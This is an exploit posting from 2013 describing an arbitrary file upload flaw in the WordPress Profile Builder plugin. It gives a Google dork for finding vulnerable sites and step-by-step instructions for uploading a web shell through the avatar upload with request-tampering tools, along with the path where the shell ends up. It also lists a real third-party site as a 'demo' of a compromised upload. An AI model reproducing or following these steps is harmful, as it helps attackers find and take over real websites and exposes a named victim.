facebook facebook twitter rss

Profile Builder Remote File uplaod

Author: xMjahd , Published: 17-05-2013
###########################################################################
[~] Exploit Title: Profile Builder Remote File uplaod
[~] Date: 02-05-2013
[~] Author: xMjahd
[~] Contact: xMjahd[at]gmail[dot]com
[~] Vendor Homepage: http://www.cozmoslabs.com/wordpress-profile-builder/
[~] Category: webapps/php
[~] Version: Requires at least: 3.1/Tested up to: 3.5/Stable tag: 1.3.4
[~] Tested on: Windows
###########################################################################

# informations
This Plugin is build to let users register on the blog and edit ther profiles
well the most sites how are infected are sites of press news geek ...

# Exploit
1 - Google Dork:"wp-content/uploads/profile_builder/"
2 - http://server/[path]/wp-login.php?action=register
3 - http://server/[path]/wp-login.php?action=login
4 - http://server/[path]/wp-admin/profile.php
Edit Ur Avatar Profile well u can upload ur shell Using Tamper data / Https Live Headers
and ur shell wil be uploaded on this Location
http://server/[path]/wp-content/uploads/profile_builder/avatars/shell.

# Demos
http://aljubailtoday.com.sa/wp-content/uploads/profile_builder/avatars/userID_136_originalAvatar_xMjahd.txt
Greet's To iPunish , xLine , Mr-H4rd3n , Federal , Sql_M4ster ,Zombi3_Ma ,Mauritanian Attacker , Dr-Spam ,
Mr-Benladen ,V!ru$ No!r, Azar36.exe ,syS Anti
[~] Made in Morocco ;p Santacruz .

Like us on Facebook :